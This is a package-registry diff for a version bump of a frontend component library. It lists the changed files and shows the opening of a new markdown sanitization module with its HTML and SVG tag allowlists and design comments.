@flamingo-stack/openframe-frontend-core 0.0.508 → 0.0.509
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/dist/chat-protocol/decode.d.ts +58 -0
- package/dist/chat-protocol/decode.d.ts.map +1 -0
- package/dist/chat-protocol/encode.d.ts +44 -0
- package/dist/chat-protocol/encode.d.ts.map +1 -0
- package/dist/chat-protocol/env-flag.d.ts +35 -0
- package/dist/chat-protocol/env-flag.d.ts.map +1 -0
- package/dist/chat-protocol/events.d.ts +216 -0
- package/dist/chat-protocol/events.d.ts.map +1 -0
- package/dist/chat-protocol/frames.d.ts +213 -0
- package/dist/chat-protocol/frames.d.ts.map +1 -0
- package/dist/chat-protocol/index.cjs +506 -0
- package/dist/chat-protocol/index.cjs.map +1 -0
- package/dist/chat-protocol/index.d.ts +18 -0
- package/dist/chat-protocol/index.d.ts.map +1 -0
- package/dist/chat-protocol/index.js +490 -0
- package/dist/chat-protocol/index.js.map +1 -0
- package/dist/chat-protocol/ip-normalize.d.ts +44 -0
- package/dist/chat-protocol/ip-normalize.d.ts.map +1 -0
- package/dist/chat-protocol/nats-decoder.d.ts +26 -0
- package/dist/chat-protocol/nats-decoder.d.ts.map +1 -0
- package/dist/{chunk-3SQ5KXHQ.cjs → chunk-2T4GTV25.cjs} +9 -9
- package/dist/{chunk-3SQ5KXHQ.cjs.map → chunk-2T4GTV25.cjs.map} +1 -1
- package/dist/{chunk-CWAOV2FK.cjs → chunk-3CGZPAGR.cjs} +3 -3
- package/dist/{chunk-CWAOV2FK.cjs.map → chunk-3CGZPAGR.cjs.map} +1 -1
- package/dist/{chunk-TLMJHMXJ.js → chunk-3QSR22IC.js} +12 -12
- package/dist/chunk-3QSR22IC.js.map +1 -0
- package/dist/{chunk-TWYNR4TZ.cjs → chunk-4G5TLHJD.cjs} +7141 -4799
- package/dist/chunk-4G5TLHJD.cjs.map +1 -0
- package/dist/{chunk-ADPMHWOE.js → chunk-72XAID7Y.js} +4 -4
- package/dist/{chunk-PAGKRNWK.js → chunk-7WZHBQ4J.js} +2 -2
- package/dist/{chunk-OCEKO5CW.js → chunk-AEELJC4N.js} +12106 -9764
- package/dist/chunk-AEELJC4N.js.map +1 -0
- package/dist/{chunk-Z42BGM6Q.cjs → chunk-BT2WWDFP.cjs} +5 -5
- package/dist/{chunk-Z42BGM6Q.cjs.map → chunk-BT2WWDFP.cjs.map} +1 -1
- package/dist/{chunk-7LEL3RIX.cjs → chunk-C7OY3PQP.cjs} +11 -11
- package/dist/{chunk-7LEL3RIX.cjs.map → chunk-C7OY3PQP.cjs.map} +1 -1
- package/dist/{chunk-RHGGEKPQ.cjs → chunk-CIOLOQKQ.cjs} +4 -4
- package/dist/{chunk-RHGGEKPQ.cjs.map → chunk-CIOLOQKQ.cjs.map} +1 -1
- package/dist/{chunk-TSZHM74B.js → chunk-DC2TKS7C.js} +2 -2
- package/dist/{chunk-M2GOR3XQ.cjs → chunk-DYPYR7FR.cjs} +87 -87
- package/dist/{chunk-M2GOR3XQ.cjs.map → chunk-DYPYR7FR.cjs.map} +1 -1
- package/dist/{chunk-I64ABCDX.js → chunk-I2B6X77L.js} +2 -2
- package/dist/{chunk-NIZDKTGL.cjs → chunk-K5MSCMDK.cjs} +37 -37
- package/dist/{chunk-NIZDKTGL.cjs.map → chunk-K5MSCMDK.cjs.map} +1 -1
- package/dist/{chunk-DTYRYB2N.js → chunk-K6QTZ7CZ.js} +2 -2
- package/dist/{chunk-4LTMXDUS.js → chunk-KBN7PMFT.js} +2 -2
- package/dist/{chunk-TBMV7I5N.js → chunk-KXZO2WZX.js} +2 -2
- package/dist/{chunk-QTYZMP6D.cjs → chunk-LBAKLT6T.cjs} +62 -62
- package/dist/chunk-LBAKLT6T.cjs.map +1 -0
- package/dist/{chunk-KEBYLU3U.js → chunk-LFUPI7VX.js} +2 -2
- package/dist/{chunk-LDTR4IVZ.cjs → chunk-M37PBG4N.cjs} +31 -31
- package/dist/{chunk-LDTR4IVZ.cjs.map → chunk-M37PBG4N.cjs.map} +1 -1
- package/dist/{chunk-WA7RR64F.js → chunk-PO5O654H.js} +6 -5
- package/dist/chunk-PO5O654H.js.map +1 -0
- package/dist/{chunk-WK4N5VBX.cjs → chunk-QJJISLPA.cjs} +28 -27
- package/dist/chunk-QJJISLPA.cjs.map +1 -0
- package/dist/{chunk-2F44PLTV.cjs → chunk-T7MCSA55.cjs} +26 -26
- package/dist/{chunk-2F44PLTV.cjs.map → chunk-T7MCSA55.cjs.map} +1 -1
- package/dist/{chunk-WJQHJD7J.js → chunk-TWSKTJHW.js} +2 -2
- package/dist/{chunk-ZSQHZYCO.cjs → chunk-UQDMJ6DH.cjs} +13 -13
- package/dist/{chunk-ZSQHZYCO.cjs.map → chunk-UQDMJ6DH.cjs.map} +1 -1
- package/dist/{chunk-TZRUCD56.js → chunk-V3ZAAFE3.js} +5 -5
- package/dist/{chunk-LRGHJPET.js → chunk-XGIFOHKE.js} +2 -2
- package/dist/{chunk-POOMO3PA.cjs → chunk-YQEPRYT5.cjs} +7 -7
- package/dist/{chunk-POOMO3PA.cjs.map → chunk-YQEPRYT5.cjs.map} +1 -1
- package/dist/components/case-studies/index.cjs +8 -8
- package/dist/components/case-studies/index.js +2 -2
- package/dist/components/chat/chat-message-enhanced.d.ts.map +1 -1
- package/dist/components/chat/chat-message-list.d.ts.map +1 -1
- package/dist/components/chat/hooks/index.d.ts +0 -1
- package/dist/components/chat/hooks/index.d.ts.map +1 -1
- package/dist/components/chat/hooks/use-chat.d.ts.map +1 -1
- package/dist/components/chat/hooks/use-chunk-catchup.d.ts.map +1 -1
- package/dist/components/chat/hooks/use-nats-chat-adapter.d.ts +15 -48
- package/dist/components/chat/hooks/use-nats-chat-adapter.d.ts.map +1 -1
- package/dist/components/chat/hooks/use-sse-chat-adapter.d.ts +10 -57
- package/dist/components/chat/hooks/use-sse-chat-adapter.d.ts.map +1 -1
- package/dist/components/chat/index.cjs +10 -2
- package/dist/components/chat/index.cjs.map +1 -1
- package/dist/components/chat/index.d.ts +1 -0
- package/dist/components/chat/index.d.ts.map +1 -1
- package/dist/components/chat/index.js +21 -13
- package/dist/components/chat/stream/chat-dialog-store.d.ts +184 -0
- package/dist/components/chat/stream/chat-dialog-store.d.ts.map +1 -0
- package/dist/components/chat/stream/chat-stream-reducer.d.ts +380 -0
- package/dist/components/chat/stream/chat-stream-reducer.d.ts.map +1 -0
- package/dist/components/chat/stream/delta-batcher.d.ts +51 -0
- package/dist/components/chat/stream/delta-batcher.d.ts.map +1 -0
- package/dist/components/chat/stream/index.d.ts +17 -0
- package/dist/components/chat/stream/index.d.ts.map +1 -0
- package/dist/components/chat/stream/message-mutations.d.ts +77 -0
- package/dist/components/chat/stream/message-mutations.d.ts.map +1 -0
- package/dist/components/chat/stream/use-chat-stream-reducer.d.ts +22 -0
- package/dist/components/chat/stream/use-chat-stream-reducer.d.ts.map +1 -0
- package/dist/components/chat/types/api.types.d.ts +1 -81
- package/dist/components/chat/types/api.types.d.ts.map +1 -1
- package/dist/components/chat/types/processing.types.d.ts +2 -93
- package/dist/components/chat/types/processing.types.d.ts.map +1 -1
- package/dist/components/chat/types/unified-chat-state.types.d.ts +15 -0
- package/dist/components/chat/types/unified-chat-state.types.d.ts.map +1 -1
- package/dist/components/chat/utils/extract-incomplete-message-state.d.ts +34 -6
- package/dist/components/chat/utils/extract-incomplete-message-state.d.ts.map +1 -1
- package/dist/components/chat/utils/history-merge.d.ts.map +1 -1
- package/dist/components/chat/utils/index.d.ts +2 -3
- package/dist/components/chat/utils/index.d.ts.map +1 -1
- package/dist/components/chat/utils/process-historical-messages.d.ts +59 -11
- package/dist/components/chat/utils/process-historical-messages.d.ts.map +1 -1
- package/dist/components/contact/index.cjs +3 -3
- package/dist/components/contact/index.js +2 -2
- package/dist/components/docs/index.cjs +5 -5
- package/dist/components/docs/index.js +4 -4
- package/dist/components/embeds/index.cjs +3 -3
- package/dist/components/embeds/index.js +2 -2
- package/dist/components/faq/index.cjs +3 -3
- package/dist/components/faq/index.js +2 -2
- package/dist/components/features/index.cjs +2 -2
- package/dist/components/features/index.js +1 -1
- package/dist/components/help-center-pages/index.cjs +22 -22
- package/dist/components/help-center-pages/index.js +13 -13
- package/dist/components/index.cjs +174 -132
- package/dist/components/index.cjs.map +1 -1
- package/dist/components/index.js +65 -23
- package/dist/components/index.js.map +1 -1
- package/dist/components/meeting-scheduler/index.cjs +34 -34
- package/dist/components/meeting-scheduler/index.js +3 -3
- package/dist/components/navigation/index.cjs +2 -2
- package/dist/components/navigation/index.js +1 -1
- package/dist/components/onboarding-guides/index.cjs +5 -5
- package/dist/components/onboarding-guides/index.js +4 -4
- package/dist/components/onboarding-guides/onboarding-guide-detail-view.d.ts.map +1 -1
- package/dist/components/related-content/index.cjs +3 -3
- package/dist/components/related-content/index.js +2 -2
- package/dist/components/shared/product-release/release-detail-page.d.ts.map +1 -1
- package/dist/components/tickets/index.cjs +6 -6
- package/dist/components/tickets/index.js +5 -5
- package/dist/components/ui/index.cjs +44 -2
- package/dist/components/ui/index.cjs.map +1 -1
- package/dist/components/ui/index.d.ts +1 -2
- package/dist/components/ui/index.d.ts.map +1 -1
- package/dist/components/ui/index.js +55 -13
- package/dist/components/ui/markdown/base-components.d.ts +51 -0
- package/dist/components/ui/markdown/base-components.d.ts.map +1 -0
- package/dist/components/ui/markdown/engine.d.ts +99 -0
- package/dist/components/ui/markdown/engine.d.ts.map +1 -0
- package/dist/components/ui/markdown/heading-ids.d.ts +65 -0
- package/dist/components/ui/markdown/heading-ids.d.ts.map +1 -0
- package/dist/components/ui/markdown/index.d.ts +18 -0
- package/dist/components/ui/markdown/index.d.ts.map +1 -0
- package/dist/components/ui/markdown/mermaid-diagram.d.ts +79 -0
- package/dist/components/ui/markdown/mermaid-diagram.d.ts.map +1 -0
- package/dist/components/ui/markdown/rich/embed-overrides.d.ts +14 -0
- package/dist/components/ui/markdown/rich/embed-overrides.d.ts.map +1 -0
- package/dist/components/ui/markdown/rich/rich-markdown-renderer.d.ts +40 -0
- package/dist/components/ui/markdown/rich/rich-markdown-renderer.d.ts.map +1 -0
- package/dist/components/ui/markdown/rich/shortcodes.d.ts +8 -0
- package/dist/components/ui/markdown/rich/shortcodes.d.ts.map +1 -0
- package/dist/components/ui/markdown/sanitize.d.ts +153 -0
- package/dist/components/ui/markdown/sanitize.d.ts.map +1 -0
- package/dist/components/ui/markdown/simple-markdown-renderer.d.ts +23 -0
- package/dist/components/ui/markdown/simple-markdown-renderer.d.ts.map +1 -0
- package/dist/components/ui/markdown/streaming.d.ts +78 -0
- package/dist/components/ui/markdown/streaming.d.ts.map +1 -0
- package/dist/components/ui/markdown/text-size.d.ts +34 -0
- package/dist/components/ui/markdown/text-size.d.ts.map +1 -0
- package/dist/index.cjs +60 -2
- package/dist/index.cjs.map +1 -1
- package/dist/index.js +71 -13
- package/dist/utils/index.cjs +169 -40
- package/dist/utils/index.cjs.map +1 -1
- package/dist/utils/index.d.ts +1 -0
- package/dist/utils/index.d.ts.map +1 -1
- package/dist/utils/index.js +162 -41
- package/dist/utils/index.js.map +1 -1
- package/dist/utils/markdown-fences.d.ts +42 -0
- package/dist/utils/markdown-fences.d.ts.map +1 -0
- package/dist/utils/markdown-heading-id.d.ts +85 -0
- package/dist/utils/markdown-heading-id.d.ts.map +1 -0
- package/dist/utils/markdown-section-extractor.d.ts.map +1 -1
- package/package.json +7 -1
- package/src/chat-protocol/__tests__/__snapshots__/nats-decoder-golden.test.ts.snap +319 -0
- package/src/chat-protocol/__tests__/chat-protocol.test.ts +516 -0
- package/src/chat-protocol/__tests__/env-flag.test.ts +52 -0
- package/src/chat-protocol/__tests__/ip-normalize.test.ts +136 -0
- package/src/chat-protocol/__tests__/nats-decoder-golden.test.ts +237 -0
- package/src/chat-protocol/decode.ts +278 -0
- package/src/chat-protocol/encode.ts +71 -0
- package/src/chat-protocol/env-flag.ts +39 -0
- package/src/chat-protocol/events.ts +254 -0
- package/src/chat-protocol/frames.ts +245 -0
- package/src/chat-protocol/index.ts +21 -0
- package/src/chat-protocol/ip-normalize.ts +146 -0
- package/src/chat-protocol/nats-decoder.ts +264 -0
- package/src/components/chat/.chat-message-list.md +10 -6
- package/src/components/chat/__tests__/chat-message-list.test.tsx +450 -9
- package/src/components/chat/__tests__/chat-message-streaming-memo.test.tsx +207 -0
- package/src/components/chat/__tests__/chat-pending-turn.test.tsx +250 -0
- package/src/components/chat/chat-message-enhanced.tsx +122 -20
- package/src/components/chat/chat-message-list.tsx +515 -133
- package/src/components/chat/embeddable-chat.tsx +6 -0
- package/src/components/chat/hooks/.index.md +30 -33
- package/src/components/chat/hooks/.use-nats-chat-adapter.md +36 -55
- package/src/components/chat/hooks/__tests__/__snapshots__/conversation-id-persistence-golden.test.ts.snap +37 -0
- package/src/components/chat/hooks/__tests__/__snapshots__/sse-stream-golden.test.ts.snap +0 -0
- package/src/components/chat/hooks/__tests__/chunk-catchup-dialog-staleness.test.ts +92 -0
- package/src/components/chat/hooks/__tests__/conversation-id-persistence-golden.test.ts +438 -0
- package/src/components/chat/hooks/__tests__/sse-stream-golden.test.ts +318 -0
- package/src/components/chat/hooks/index.ts +0 -1
- package/src/components/chat/hooks/use-chat.ts +8 -0
- package/src/components/chat/hooks/use-chunk-catchup.ts +26 -1
- package/src/components/chat/hooks/use-nats-chat-adapter.ts +254 -825
- package/src/components/chat/hooks/use-sse-chat-adapter.ts +380 -684
- package/src/components/chat/index.ts +5 -0
- package/src/components/chat/stream/__tests__/__snapshots__/chat-stream-reducer-golden.test.ts.snap +944 -0
- package/src/components/chat/stream/__tests__/chat-dialog-store.test.ts +806 -0
- package/src/components/chat/stream/__tests__/chat-stream-reducer-golden.test.ts +467 -0
- package/src/components/chat/stream/__tests__/chat-stream-reducer.test.ts +1330 -0
- package/src/components/chat/stream/__tests__/delta-batcher.test.ts +255 -0
- package/src/components/chat/stream/__tests__/use-chat-stream-reducer.test.ts +105 -0
- package/src/components/chat/stream/chat-dialog-store.ts +536 -0
- package/src/components/chat/stream/chat-stream-reducer.ts +1928 -0
- package/src/components/chat/stream/delta-batcher.ts +168 -0
- package/src/components/chat/stream/index.ts +55 -0
- package/src/components/chat/stream/message-mutations.ts +340 -0
- package/src/components/chat/stream/use-chat-stream-reducer.ts +126 -0
- package/src/components/chat/thinking-display.tsx +1 -1
- package/src/components/chat/types/.api.types.md +39 -49
- package/src/components/chat/types/.processing.types.md +29 -58
- package/src/components/chat/types/.unified-chat-state.types.md +2 -2
- package/src/components/chat/types/api.types.ts +6 -73
- package/src/components/chat/types/processing.types.ts +11 -53
- package/src/components/chat/types/unified-chat-state.types.ts +16 -0
- package/src/components/chat/utils/.extract-incomplete-message-state.md +21 -3
- package/src/components/chat/utils/.history-merge.md +44 -3
- package/src/components/chat/utils/.index.md +31 -40
- package/src/components/chat/utils/__tests__/__snapshots__/process-historical-messages-golden.test.ts.snap +420 -0
- package/src/components/chat/utils/__tests__/__snapshots__/segment-accumulator-golden.test.ts.snap +605 -0
- package/src/components/chat/utils/__tests__/extract-incomplete-message-state.test.ts +106 -0
- package/src/components/chat/utils/__tests__/history-merge.test.ts +160 -0
- package/src/components/chat/utils/__tests__/process-historical-messages-approvals.test.ts +61 -0
- package/src/components/chat/utils/__tests__/process-historical-messages-golden.test.ts +394 -0
- package/src/components/chat/utils/__tests__/segment-accumulator-golden.test.ts +270 -0
- package/src/components/chat/utils/extract-incomplete-message-state.ts +93 -6
- package/src/components/chat/utils/history-merge.ts +85 -5
- package/src/components/chat/utils/index.ts +5 -8
- package/src/components/chat/utils/process-historical-messages.ts +361 -385
- package/src/components/onboarding-guides/onboarding-guide-detail-view.tsx +22 -4
- package/src/components/shared/legal-document/legal-document-page.tsx +1 -1
- package/src/components/shared/product-release/release-detail-page.tsx +19 -4
- package/src/components/ui/__tests__/__snapshots__/markdown-parity.test.tsx.snap +2420 -0
- package/src/components/ui/__tests__/markdown-parity.test.tsx +2540 -0
- package/src/components/ui/index.ts +1 -2
- package/src/components/ui/markdown/__tests__/mermaid-security.test.ts +176 -0
- package/src/components/ui/markdown/__tests__/mermaid-stale-render.test.tsx +151 -0
- package/src/components/ui/markdown/__tests__/sanitize-invariant.test.ts +354 -0
- package/src/components/ui/markdown/__tests__/sanitize-render.test.tsx +118 -0
- package/src/components/ui/markdown/__tests__/streaming.test.tsx +436 -0
- package/src/components/ui/markdown/base-components.tsx +360 -0
- package/src/components/ui/markdown/engine.tsx +315 -0
- package/src/components/ui/markdown/heading-ids.ts +239 -0
- package/src/components/ui/markdown/index.ts +49 -0
- package/src/components/ui/markdown/mermaid-diagram.tsx +323 -0
- package/src/components/ui/markdown/rich/embed-overrides.tsx +199 -0
- package/src/components/ui/markdown/rich/rich-markdown-renderer.tsx +184 -0
- package/src/components/ui/markdown/rich/shortcodes.ts +170 -0
- package/src/components/ui/markdown/sanitize.ts +3584 -0
- package/src/components/ui/markdown/simple-markdown-renderer.tsx +28 -0
- package/src/components/ui/markdown/streaming.ts +390 -0
- package/src/components/ui/markdown/text-size.ts +106 -0
- package/src/components/ui/release-changelog-section.tsx +1 -1
- package/src/components/ui/ticket-info-section.tsx +1 -1
- package/src/utils/index.ts +1 -0
- package/src/utils/markdown-fences.ts +127 -0
- package/src/utils/markdown-heading-id.ts +348 -0
- package/src/utils/markdown-section-extractor.ts +41 -56
- package/dist/chunk-OCEKO5CW.js.map +0 -1
- package/dist/chunk-QTYZMP6D.cjs.map +0 -1
- package/dist/chunk-TLMJHMXJ.js.map +0 -1
- package/dist/chunk-TWYNR4TZ.cjs.map +0 -1
- package/dist/chunk-WA7RR64F.js.map +0 -1
- package/dist/chunk-WK4N5VBX.cjs.map +0 -1
- package/dist/components/chat/hooks/use-realtime-chunk-processor.d.ts +0 -6
- package/dist/components/chat/hooks/use-realtime-chunk-processor.d.ts.map +0 -1
- package/dist/components/chat/utils/chunk-parser.d.ts +0 -25
- package/dist/components/chat/utils/chunk-parser.d.ts.map +0 -1
- package/dist/components/ui/rich-markdown-renderer.d.ts +0 -34
- package/dist/components/ui/rich-markdown-renderer.d.ts.map +0 -1
- package/dist/components/ui/simple-markdown-renderer.d.ts +0 -73
- package/dist/components/ui/simple-markdown-renderer.d.ts.map +0 -1
- package/src/components/chat/hooks/.use-realtime-chunk-processor.md +0 -77
- package/src/components/chat/hooks/use-realtime-chunk-processor.ts +0 -489
- package/src/components/chat/utils/.chunk-parser.md +0 -62
- package/src/components/chat/utils/chunk-parser.ts +0 -262
- package/src/components/ui/.simple-markdown-renderer.md +0 -52
- package/src/components/ui/rich-markdown-renderer.tsx +0 -1223
- package/src/components/ui/simple-markdown-renderer.tsx +0 -964
- /package/dist/{chunk-ADPMHWOE.js.map → chunk-72XAID7Y.js.map} +0 -0
- /package/dist/{chunk-PAGKRNWK.js.map → chunk-7WZHBQ4J.js.map} +0 -0
- /package/dist/{chunk-TSZHM74B.js.map → chunk-DC2TKS7C.js.map} +0 -0
- /package/dist/{chunk-I64ABCDX.js.map → chunk-I2B6X77L.js.map} +0 -0
- /package/dist/{chunk-DTYRYB2N.js.map → chunk-K6QTZ7CZ.js.map} +0 -0
- /package/dist/{chunk-4LTMXDUS.js.map → chunk-KBN7PMFT.js.map} +0 -0
- /package/dist/{chunk-TBMV7I5N.js.map → chunk-KXZO2WZX.js.map} +0 -0
- /package/dist/{chunk-KEBYLU3U.js.map → chunk-LFUPI7VX.js.map} +0 -0
- /package/dist/{chunk-WJQHJD7J.js.map → chunk-TWSKTJHW.js.map} +0 -0
- /package/dist/{chunk-TZRUCD56.js.map → chunk-V3ZAAFE3.js.map} +0 -0
- /package/dist/{chunk-LRGHJPET.js.map → chunk-XGIFOHKE.js.map} +0 -0
|
@@ -0,0 +1,3584 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Sanitization SSOT for the unified markdown engine.
|
|
3
|
+
*
|
|
4
|
+
* Layered defense (order matters, see engine.tsx):
|
|
5
|
+
* 1. `escapeUnknownHtmlTags` — TEXT pre-pass. Escapes `<tag>`s outside the
|
|
6
|
+
* effective allowlist so LLM-emitted pseudo-tags (`<their>`, `<ticket>`)
|
|
7
|
+
* never reach React as unknown elements (React 19 crash guard).
|
|
8
|
+
* NOT a security boundary.
|
|
9
|
+
* 2. `rehype-raw` parses remaining raw HTML into HAST.
|
|
10
|
+
* 3. `rehypeSanitize` with `buildSanitizeSchema(...)` — the audited
|
|
11
|
+
* allow-list boundary (hast-util-sanitize) with a schema extended to
|
|
12
|
+
* exactly what our surfaces need.
|
|
13
|
+
* 4. `rehypeStripUnsafe` — custom strip pass kept as defense-in-depth
|
|
14
|
+
* (srcset candidate scanning, iframe[srcdoc], belt-and-suspenders if
|
|
15
|
+
* the schema is ever loosened).
|
|
16
|
+
*
|
|
17
|
+
* COUPLED-ALLOWLIST INVARIANT (tested in __tests__/sanitize-invariant.test.ts):
|
|
18
|
+
* the two effective tag lists are EQUAL (case-insensitively), both computed
|
|
19
|
+
* AFTER merging `extraAllowedHtmlTags`. Both directions matter:
|
|
20
|
+
* - pre-pass ⊆ sanitizer: the pre-pass must never admit a raw tag the
|
|
21
|
+
* sanitizer then silently drops.
|
|
22
|
+
* - sanitizer ⊆ pre-pass: the pre-pass must never ESCAPE a tag the
|
|
23
|
+
* sanitizer would happily keep. This direction was broken before
|
|
24
|
+
* 2026-07: `strike` (and every other `defaultSchema`-only tag) survived
|
|
25
|
+
* the sanitizer but was escaped to `<strike>` source text by the
|
|
26
|
+
* pre-pass, so legacy authored markup regressed to visible tag soup.
|
|
27
|
+
* Both lists are now derived from the SINGLE `effectiveTagList()` below —
|
|
28
|
+
* never fork them.
|
|
29
|
+
*
|
|
30
|
+
* ONE documented exception, and it is CONTENT-dependent rather than
|
|
31
|
+
* list-level (so the invariant test still holds as an equality of tag SETS):
|
|
32
|
+
* an UNCLOSED RAWTEXT/RCDATA opener (`<textarea>`, `<iframe>`, `<title>`, …)
|
|
33
|
+
* is escaped by the pre-pass even though the sanitizer allowlists it —
|
|
34
|
+
* because parse5's tokenizer would otherwise swallow the remainder of the
|
|
35
|
+
* document into it before the sanitizer ever runs. See RAWTEXT_TAGS below.
|
|
36
|
+
*/
|
|
37
|
+
import { defaultSchema } from 'rehype-sanitize'
|
|
38
|
+
import { visit } from 'unist-util-visit'
|
|
39
|
+
import { defaultUrlTransform } from 'react-markdown'
|
|
40
|
+
import { createFenceTracker, isBlankLine } from '../../../utils/markdown-fences'
|
|
41
|
+
|
|
42
|
+
// ---------------------------------------------------------------------------
|
|
43
|
+
// Shared tag allowlist (pre-pass baseline)
|
|
44
|
+
// ---------------------------------------------------------------------------
|
|
45
|
+
/**
|
|
46
|
+
* Tags the TEXT pre-pass forwards as raw HTML. Anything outside this set
|
|
47
|
+
* (plus per-composition `extraAllowedHtmlTags`) gets its angle brackets
|
|
48
|
+
* escaped and renders as plain text.
|
|
49
|
+
*
|
|
50
|
+
* `video` is deliberately NOT in the baseline: chat strips <video>
|
|
51
|
+
* server-side and playback goes through the <Video> SSOT. The rich
|
|
52
|
+
* composition opts back in via `extraAllowedHtmlTags={['video', 'source']}`
|
|
53
|
+
* so authored content (blog publisher video injection) keeps working.
|
|
54
|
+
*/
|
|
55
|
+
export const SAFE_HTML_TAGS = new Set([
|
|
56
|
+
// Block + inline text
|
|
57
|
+
'a', 'abbr', 'address', 'article', 'aside', 'b', 'bdi', 'bdo', 'blockquote',
|
|
58
|
+
'br', 'caption', 'cite', 'code', 'col', 'colgroup', 'data', 'dd', 'del',
|
|
59
|
+
'details', 'dfn', 'div', 'dl', 'dt', 'em', 'figcaption', 'figure', 'footer',
|
|
60
|
+
'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'header', 'hgroup', 'hr', 'i', 'ins',
|
|
61
|
+
'kbd', 'li', 'main', 'mark', 'nav', 'ol', 'p', 'pre', 'q', 'rp', 'rt',
|
|
62
|
+
'ruby', 's', 'samp', 'section', 'small', 'span', 'strong', 'sub', 'summary',
|
|
63
|
+
'sup', 'table', 'tbody', 'td', 'tfoot', 'th', 'thead', 'time', 'tr', 'u',
|
|
64
|
+
'ul', 'var', 'wbr',
|
|
65
|
+
// Deprecated presentational tags that REAL authored content still carries.
|
|
66
|
+
// They rendered before the unification (neither old renderer had a
|
|
67
|
+
// pre-pass), so escaping them to visible `<center>` source text was a
|
|
68
|
+
// regression. `font` gets its legacy attributes below so the sanitizer
|
|
69
|
+
// doesn't reduce it to a bare no-op tag. (`marquee` stays out — it is
|
|
70
|
+
// animated chrome, not text markup, and no audit hit found it.)
|
|
71
|
+
'center', 'font', 'big',
|
|
72
|
+
// Media ('video' intentionally excluded — see the header comment)
|
|
73
|
+
'img', 'picture', 'source', 'audio', 'iframe', 'track',
|
|
74
|
+
// Forms (rehype-raw allows them; mostly harmless for chat output)
|
|
75
|
+
'button', 'input', 'label', 'select', 'option', 'optgroup', 'textarea', 'form', 'fieldset', 'legend',
|
|
76
|
+
])
|
|
77
|
+
|
|
78
|
+
/**
|
|
79
|
+
* Inline SVG element set, in the CANONICAL case parse5 produces for SVG
|
|
80
|
+
* foreign content (`linearGradient`, `clipPath`, … are camelCase in the
|
|
81
|
+
* HTML parser's SVG adjustment table, so the sanitize schema must match
|
|
82
|
+
* that spelling; the text pre-pass lowercases before lookup).
|
|
83
|
+
*
|
|
84
|
+
* Inline `<svg>` renders in real published posts (hand-authored diagrams
|
|
85
|
+
* and inline icon markup — NOT `<use href>` sprite references, which are
|
|
86
|
+
* deliberately dropped; see SVG_ATTRIBUTES). The Rich renderer had NO pre-pass
|
|
87
|
+
* and NO sanitizer, so it always rendered; without this set the unified
|
|
88
|
+
* engine would escape it to visible source text.
|
|
89
|
+
*
|
|
90
|
+
* SEVERAL OF THESE NAMES ARE ALSO HTML ELEMENTS (`title`, `desc`, `text`,
|
|
91
|
+
* `g`, `line`, `use`, `symbol`, `marker`, `mask`, `pattern`) — admitting
|
|
92
|
+
* them UNCONSTRAINED let a post or a chat message emit a bare `<title>`,
|
|
93
|
+
* which React 19 hoists into `<head>` (browser-tab + SEO title hijack) and
|
|
94
|
+
* whose RAWTEXT content model swallows the rest of the document when
|
|
95
|
+
* unclosed. They are therefore pinned to an `svg` ancestor in
|
|
96
|
+
* `SVG_ONLY_ANCESTORS` below; outside `<svg>` the sanitizer drops them.
|
|
97
|
+
*/
|
|
98
|
+
export const SVG_TAGS = new Set([
|
|
99
|
+
'svg', 'path', 'circle', 'ellipse', 'g', 'rect', 'line', 'polyline',
|
|
100
|
+
'polygon', 'text', 'tspan', 'defs', 'use', 'symbol', 'title', 'desc',
|
|
101
|
+
'marker', 'mask', 'pattern', 'linearGradient', 'radialGradient', 'stop',
|
|
102
|
+
'clipPath',
|
|
103
|
+
])
|
|
104
|
+
|
|
105
|
+
/**
|
|
106
|
+
* Required-ancestor constraints for the SVG-only tags (hast-util-sanitize
|
|
107
|
+
* `ancestors`: a listed tag survives ONLY inside one of its ancestors).
|
|
108
|
+
*
|
|
109
|
+
* The TEXT pre-pass may still forward these — it is a flat regex over source
|
|
110
|
+
* text, cannot see nesting, and is explicitly NOT a security boundary. The
|
|
111
|
+
* coupled-allowlist invariant still holds because `ancestors` RESTRICTS a
|
|
112
|
+
* tag the schema already lists; it never adds one the pre-pass would escape.
|
|
113
|
+
*/
|
|
114
|
+
const SVG_ONLY_ANCESTORS: Record<string, string[]> = {
|
|
115
|
+
title: ['svg'],
|
|
116
|
+
desc: ['svg'],
|
|
117
|
+
text: ['svg'],
|
|
118
|
+
tspan: ['svg', 'text'],
|
|
119
|
+
use: ['svg'],
|
|
120
|
+
symbol: ['svg'],
|
|
121
|
+
marker: ['svg'],
|
|
122
|
+
mask: ['svg'],
|
|
123
|
+
pattern: ['svg'],
|
|
124
|
+
g: ['svg'],
|
|
125
|
+
line: ['svg'],
|
|
126
|
+
path: ['svg'],
|
|
127
|
+
circle: ['svg'],
|
|
128
|
+
ellipse: ['svg'],
|
|
129
|
+
rect: ['svg'],
|
|
130
|
+
polyline: ['svg'],
|
|
131
|
+
polygon: ['svg'],
|
|
132
|
+
defs: ['svg'],
|
|
133
|
+
stop: ['svg'],
|
|
134
|
+
linearGradient: ['svg'],
|
|
135
|
+
radialGradient: ['svg'],
|
|
136
|
+
clipPath: ['svg'],
|
|
137
|
+
}
|
|
138
|
+
|
|
139
|
+
/**
|
|
140
|
+
* THE effective tag list for a composition, canonical case — the single
|
|
141
|
+
* source both the pre-pass set and the sanitize schema derive from
|
|
142
|
+
* (coupled-allowlist invariant, both directions).
|
|
143
|
+
*
|
|
144
|
+
* `defaultSchema.tagNames` is unioned in so the pre-pass can never escape a
|
|
145
|
+
* tag hast-util-sanitize would keep (`strike`, `tt`, …).
|
|
146
|
+
*/
|
|
147
|
+
function effectiveTagList(extraAllowedHtmlTags?: string[]): string[] {
|
|
148
|
+
return [
|
|
149
|
+
...(defaultSchema.tagNames ?? []),
|
|
150
|
+
...SAFE_HTML_TAGS,
|
|
151
|
+
...SVG_TAGS,
|
|
152
|
+
...(extraAllowedHtmlTags ?? []),
|
|
153
|
+
]
|
|
154
|
+
}
|
|
155
|
+
|
|
156
|
+
/** Effective pre-pass tag set for a composition (lowercased for lookup). */
|
|
157
|
+
export function buildEffectiveTagSet(extraAllowedHtmlTags?: string[]): Set<string> {
|
|
158
|
+
return new Set(effectiveTagList(extraAllowedHtmlTags).map((t) => t.toLowerCase()))
|
|
159
|
+
}
|
|
160
|
+
|
|
161
|
+
// ---------------------------------------------------------------------------
|
|
162
|
+
// rehype-sanitize schema (allow-list boundary)
|
|
163
|
+
